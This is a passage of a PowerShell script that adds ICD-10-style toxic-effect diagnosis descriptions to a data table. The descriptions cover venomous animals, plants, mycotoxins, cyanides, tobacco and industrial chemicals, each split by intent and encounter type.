contact with other venomous marine animals, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous marine animals, undetermined","Toxic effect of contact with other venomous marine animals, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous marine animals, undetermined","Toxic effect of contact with other venomous marine animals, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous marine animals, undetermined","Toxic effect of contact with other venomous marine animals, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with venomous marine plant, accidental (unintentional)","Toxic effect of contact with venomous marine plant, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with venomous marine plant, accidental (unintentional)","Toxic effect of contact with venomous marine plant, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with venomous marine plant, accidental (unintentional)","Toxic effect of contact with venomous marine plant, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with venomous marine plant, intentional self-harm","Toxic effect of contact with venomous marine plant, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with venomous marine plant, intentional self-harm","Toxic effect of contact with venomous marine plant, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with venomous marine plant, intentional self-harm","Toxic effect of contact with venomous marine plant, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with venomous marine plant, assault","Toxic effect of contact with venomous marine plant, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with venomous marine plant, assault","Toxic effect of contact with venomous marine plant, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with venomous marine plant, assault","Toxic effect of contact with venomous marine plant, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with venomous marine plant, undetermined","Toxic effect of contact with venomous marine plant, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with venomous marine plant, undetermined","Toxic effect of contact with venomous marine plant, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with venomous marine plant, undetermined","Toxic effect of contact with venomous marine plant, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous plant, accidental (unintentional)","Toxic effect of contact with other venomous plant, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous plant, accidental (unintentional)","Toxic effect of contact with other venomous plant, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous plant, accidental (unintentional)","Toxic effect of contact with other venomous plant, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous plant, intentional self-harm","Toxic effect of contact with other venomous plant, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous plant, intentional self-harm","Toxic effect of contact with other venomous plant, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous plant, intentional self-harm","Toxic effect of contact with other venomous plant, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous plant, assault","Toxic effect of contact with other venomous plant, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous plant, assault","Toxic effect of contact with other venomous plant, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous plant, assault","Toxic effect of contact with other venomous plant, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous plant, undetermined","Toxic effect of contact with other venomous plant, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous plant, undetermined","Toxic effect of contact with other venomous plant, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous plant, undetermined","Toxic effect of contact with other venomous plant, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with venomous frog, accidental (unintentional)","Toxic effect of contact with venomous frog, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with venomous frog, accidental (unintentional)","Toxic effect of contact with venomous frog, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with venomous frog, accidental (unintentional)","Toxic effect of contact with venomous frog, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with venomous frog, intentional self-harm","Toxic effect of contact with venomous frog, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with venomous frog, intentional self-harm","Toxic effect of contact with venomous frog, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with venomous frog, intentional self-harm","Toxic effect of contact with venomous frog, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with venomous frog, assault","Toxic effect of contact with venomous frog, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with venomous frog, assault","Toxic effect of contact with venomous frog, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with venomous frog, assault","Toxic effect of contact with venomous frog, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with venomous frog, undetermined","Toxic effect of contact with venomous frog, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with venomous frog, undetermined","Toxic effect of contact with venomous frog, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with venomous frog, undetermined","Toxic effect of contact with venomous frog, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with venomous toad, accidental (unintentional)","Toxic effect of contact with venomous toad, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with venomous toad, accidental (unintentional)","Toxic effect of contact with venomous toad, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with venomous toad, accidental (unintentional)","Toxic effect of contact with venomous toad, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with venomous toad, intentional self-harm","Toxic effect of contact with venomous toad, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with venomous toad, intentional self-harm","Toxic effect of contact with venomous toad, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with venomous toad, intentional self-harm","Toxic effect of contact with venomous toad, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with venomous toad, assault","Toxic effect of contact with venomous toad, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with venomous toad, assault","Toxic effect of contact with venomous toad, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with venomous toad, assault","Toxic effect of contact with venomous toad, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with venomous toad, undetermined","Toxic effect of contact with venomous toad, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with venomous toad, undetermined","Toxic effect of contact with venomous toad, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with venomous toad, undetermined","Toxic effect of contact with venomous toad, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous amphibian, accidental (unintentional)","Toxic effect of contact with other venomous amphibian, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous amphibian, accidental (unintentional)","Toxic effect of contact with other venomous amphibian, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous amphibian, accidental (unintentional)","Toxic effect of contact with other venomous amphibian, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous amphibian, intentional self-harm","Toxic effect of contact with other venomous amphibian, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous amphibian, intentional self-harm","Toxic effect of contact with other venomous amphibian, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous amphibian, intentional self-harm","Toxic effect of contact with other venomous amphibian, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous amphibian, assault","Toxic effect of contact with other venomous amphibian, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous amphibian, assault","Toxic effect of contact with other venomous amphibian, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous amphibian, assault","Toxic effect of contact with other venomous amphibian, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous amphibian, undetermined","Toxic effect of contact with other venomous amphibian, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous amphibian, undetermined","Toxic effect of contact with other venomous amphibian, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous amphibian, undetermined","Toxic effect of contact with other venomous amphibian, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous animals, accidental (unintentional)","Toxic effect of contact with other venomous animals, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous animals, accidental (unintentional)","Toxic effect of contact with other venomous animals, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous animals, accidental (unintentional)","Toxic effect of contact with other venomous animals, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous animals, intentional self-harm","Toxic effect of contact with other venomous animals, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous animals, intentional self-harm","Toxic effect of contact with other venomous animals, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous animals, intentional self-harm","Toxic effect of contact with other venomous animals, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous animals, assault","Toxic effect of contact with other venomous animals, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous animals, assault","Toxic effect of contact with other venomous animals, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous animals, assault","Toxic effect of contact with other venomous animals, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous animals, undetermined","Toxic effect of contact with other venomous animals, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous animals, undetermined","Toxic effect of contact with other venomous animals, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous animals, undetermined","Toxic effect of contact with other venomous animals, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with unspecified venomous animal, accidental (unintentional)","Toxic effect of contact with unspecified venomous animal, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with unspecified venomous animal, accidental (unintentional)","Toxic effect of contact with unspecified venomous animal, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with unspecified venomous animal, accidental (unintentional)","Toxic effect of contact with unspecified venomous animal, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with unspecified venomous animal, intentional self-harm","Toxic effect of contact with unspecified venomous animal, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with unspecified venomous animal, intentional self-harm","Toxic effect of contact with unspecified venomous animal, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with unspecified venomous animal, intentional self-harm","Toxic effect of contact with unspecified venomous animal, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with unspecified venomous animal, assault","Toxic effect of contact with unspecified venomous animal, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with unspecified venomous animal, assault","Toxic effect of contact with unspecified venomous animal, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with unspecified venomous animal, assault","Toxic effect of contact with unspecified venomous animal, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with unspecified venomous animal, undetermined","Toxic effect of contact with unspecified venomous animal, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with unspecified venomous animal, undetermined","Toxic effect of contact with unspecified venomous animal, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with unspecified venomous animal, undetermined","Toxic effect of contact with unspecified venomous animal, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of aflatoxin, accidental (unintentional)","Toxic effect of aflatoxin, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of aflatoxin, accidental (unintentional)","Toxic effect of aflatoxin, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of aflatoxin, accidental (unintentional)","Toxic effect of aflatoxin, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of aflatoxin, intentional self-harm","Toxic effect of aflatoxin, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of aflatoxin, intentional self-harm","Toxic effect of aflatoxin, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of aflatoxin, intentional self-harm","Toxic effect of aflatoxin, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of aflatoxin, assault","Toxic effect of aflatoxin, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of aflatoxin, assault","Toxic effect of aflatoxin, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of aflatoxin, assault","Toxic effect of aflatoxin, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of aflatoxin, undetermined","Toxic effect of aflatoxin, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of aflatoxin, undetermined","Toxic effect of aflatoxin, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of aflatoxin, undetermined","Toxic effect of aflatoxin, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other mycotoxin food contaminants, accidental (unintentional)","Toxic effect of other mycotoxin food contaminants, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other mycotoxin food contaminants, accidental (unintentional)","Toxic effect of other mycotoxin food contaminants, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other mycotoxin food contaminants, accidental (unintentional)","Toxic effect of other mycotoxin food contaminants, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other mycotoxin food contaminants, intentional self-harm","Toxic effect of other mycotoxin food contaminants, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other mycotoxin food contaminants, intentional self-harm","Toxic effect of other mycotoxin food contaminants, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other mycotoxin food contaminants, intentional self-harm","Toxic effect of other mycotoxin food contaminants, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other mycotoxin food contaminants, assault","Toxic effect of other mycotoxin food contaminants, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other mycotoxin food contaminants, assault","Toxic effect of other mycotoxin food contaminants, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other mycotoxin food contaminants, assault","Toxic effect of other mycotoxin food contaminants, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other mycotoxin food contaminants, undetermined","Toxic effect of other mycotoxin food contaminants, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other mycotoxin food contaminants, undetermined","Toxic effect of other mycotoxin food contaminants, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other mycotoxin food contaminants, undetermined","Toxic effect of other mycotoxin food contaminants, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of cyanides, accidental (unintentional)","Toxic effect of cyanides, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of cyanides, accidental (unintentional)","Toxic effect of cyanides, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of cyanides, accidental (unintentional)","Toxic effect of cyanides, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of cyanides, intentional self-harm","Toxic effect of cyanides, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of cyanides, intentional self-harm","Toxic effect of cyanides, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of cyanides, intentional self-harm","Toxic effect of cyanides, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of cyanides, assault","Toxic effect of cyanides, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of cyanides, assault","Toxic effect of cyanides, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of cyanides, assault","Toxic effect of cyanides, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of cyanides, undetermined","Toxic effect of cyanides, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of cyanides, undetermined","Toxic effect of cyanides, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of cyanides, undetermined","Toxic effect of cyanides, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of strychnine and its salts, accidental (unintentional)","Toxic effect of strychnine and its salts, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of strychnine and its salts, accidental (unintentional)","Toxic effect of strychnine and its salts, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of strychnine and its salts, accidental (unintentional)","Toxic effect of strychnine and its salts, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of strychnine and its salts, intentional self-harm","Toxic effect of strychnine and its salts, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of strychnine and its salts, intentional self-harm","Toxic effect of strychnine and its salts, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of strychnine and its salts, intentional self-harm","Toxic effect of strychnine and its salts, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of strychnine and its salts, assault","Toxic effect of strychnine and its salts, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of strychnine and its salts, assault","Toxic effect of strychnine and its salts, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of strychnine and its salts, assault","Toxic effect of strychnine and its salts, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of strychnine and its salts, undetermined","Toxic effect of strychnine and its salts, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of strychnine and its salts, undetermined","Toxic effect of strychnine and its salts, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of strychnine and its salts, undetermined","Toxic effect of strychnine and its salts, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of chewing tobacco, accidental (unintentional)","Toxic effect of chewing tobacco, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of chewing tobacco, accidental (unintentional)","Toxic effect of chewing tobacco, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of chewing tobacco, accidental (unintentional)","Toxic effect of chewing tobacco, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of chewing tobacco, intentional self-harm","Toxic effect of chewing tobacco, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of chewing tobacco, intentional self-harm","Toxic effect of chewing tobacco, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of chewing tobacco, intentional self-harm","Toxic effect of chewing tobacco, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of chewing tobacco, assault","Toxic effect of chewing tobacco, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of chewing tobacco, assault","Toxic effect of chewing tobacco, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of chewing tobacco, assault","Toxic effect of chewing tobacco, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of chewing tobacco, undetermined","Toxic effect of chewing tobacco, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of chewing tobacco, undetermined","Toxic effect of chewing tobacco, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of chewing tobacco, undetermined","Toxic effect of chewing tobacco, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of tobacco cigarettes, accidental (unintentional)","Toxic effect of tobacco cigarettes, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of tobacco cigarettes, accidental (unintentional)","Toxic effect of tobacco cigarettes, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of tobacco cigarettes, accidental (unintentional)","Toxic effect of tobacco cigarettes, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of tobacco cigarettes, intentional self-harm","Toxic effect of tobacco cigarettes, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of tobacco cigarettes, intentional self-harm","Toxic effect of tobacco cigarettes, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of tobacco cigarettes, intentional self-harm","Toxic effect of tobacco cigarettes, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of tobacco cigarettes, assault","Toxic effect of tobacco cigarettes, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of tobacco cigarettes, assault","Toxic effect of tobacco cigarettes, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of tobacco cigarettes, assault","Toxic effect of tobacco cigarettes, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of tobacco cigarettes, undetermined","Toxic effect of tobacco cigarettes, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of tobacco cigarettes, undetermined","Toxic effect of tobacco cigarettes, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of tobacco cigarettes, undetermined","Toxic effect of tobacco cigarettes, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other tobacco and nicotine, accidental (unintentional)","Toxic effect of other tobacco and nicotine, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other tobacco and nicotine, accidental (unintentional)","Toxic effect of other tobacco and nicotine, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other tobacco and nicotine, accidental (unintentional)","Toxic effect of other tobacco and nicotine, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other tobacco and nicotine, intentional self-harm","Toxic effect of other tobacco and nicotine, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other tobacco and nicotine, intentional self-harm","Toxic effect of other tobacco and nicotine, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other tobacco and nicotine, intentional self-harm","Toxic effect of other tobacco and nicotine, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other tobacco and nicotine, assault","Toxic effect of other tobacco and nicotine, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other tobacco and nicotine, assault","Toxic effect of other tobacco and nicotine, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other tobacco and nicotine, assault","Toxic effect of other tobacco and nicotine, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other tobacco and nicotine, undetermined","Toxic effect of other tobacco and nicotine, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other tobacco and nicotine, undetermined","Toxic effect of other tobacco and nicotine, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other tobacco and nicotine, undetermined","Toxic effect of other tobacco and nicotine, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of nitroderivatives and aminoderivatives of benzene and its homologues, accidental (unintentional)","Toxic effect of nitroderivatives and aminoderivatives of benzene and its homologues, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of nitroderivatives and aminoderivatives of benzene and its homologues, accidental (unintentional)","Toxic effect of nitroderivatives and aminoderivatives of benzene and its homologues, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of nitroderivatives and aminoderivatives of benzene and its homologues, accidental (unintentional)","Toxic effect of nitroderivatives and aminoderivatives of benzene and its homologues, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of nitroderivatives and aminoderivatives of benzene and its homologues, intentional self-harm","Toxic effect of nitroderivatives and aminoderivatives of benzene and its homologues, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of nitroderivatives and aminoderivatives of benzene and its homologues, intentional self-harm","Toxic effect of nitroderivatives and aminoderivatives of benzene and its homologues, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of nitroderivatives and aminoderivatives of benzene and its homologues, intentional self-harm","Toxic effect of nitroderivatives and aminoderivatives of benzene and its homologues, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of nitroderivatives and aminoderivatives of benzene and its homologues, assault","Toxic effect of nitroderivatives and aminoderivatives of benzene and its homologues, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of nitroderivatives and aminoderivatives of benzene and its homologues, assault","Toxic effect of nitroderivatives and aminoderivatives of benzene and its homologues, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of nitroderivatives and aminoderivatives of benzene and its homologues, assault","Toxic effect of nitroderivatives and aminoderivatives of benzene and its homologues, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of nitroderivatives and aminoderivatives of benzene and its homologues, undetermined","Toxic effect of nitroderivatives and aminoderivatives of benzene and its homologues, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of nitroderivatives and aminoderivatives of benzene and its homologues, undetermined","Toxic effect of nitroderivatives and aminoderivatives of benzene and its homologues, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of nitroderivatives and aminoderivatives of benzene and its homologues, undetermined","Toxic effect of nitroderivatives and aminoderivatives of benzene and its homologues, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon disulfide, accidental (unintentional)","Toxic effect of carbon disulfide, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon disulfide, accidental (unintentional)","Toxic effect of carbon disulfide, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon disulfide, accidental (unintentional)","Toxic effect of carbon disulfide, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon disulfide, intentional self-harm","Toxic effect of carbon disulfide, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon disulfide, intentional self-harm","Toxic effect of carbon disulfide, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon disulfide, intentional self-harm","Toxic effect of carbon disulfide, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon disulfide, assault","Toxic effect of carbon disulfide, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon disulfide, assault","Toxic effect of carbon disulfide, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon disulfide, assault","Toxic effect of carbon disulfide, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon disulfide, undetermined","Toxic effect of carbon disulfide, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon disulfide, undetermined","Toxic effect of carbon disulfide, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon disulfide, undetermined","Toxic effect of carbon disulfide, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of nitroglycerin and other nitric acids and esters, accidental (unintentional)","Toxic effect of nitroglycerin and other nitric acids and esters, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of nitroglycerin and other nitric acids and esters, accidental (unintentional)","Toxic effect of nitroglycerin and other nitric acids and esters, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of nitroglycerin and other nitric acids and esters, accidental (unintentional)","Toxic effect of nitroglycerin and other nitric acids and esters, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of nitroglycerin and other nitric acids and esters, intentional self-harm","Toxic effect of nitroglycerin and other nitric acids and esters, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of nitroglycerin and other nitric acids and esters, intentional self-harm","Toxic effect of nitroglycerin and other nitric acids and esters, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of nitroglycerin and other nitric acids and esters, intentional self-harm","Toxic effect of nitroglycerin and other nitric acids and esters, 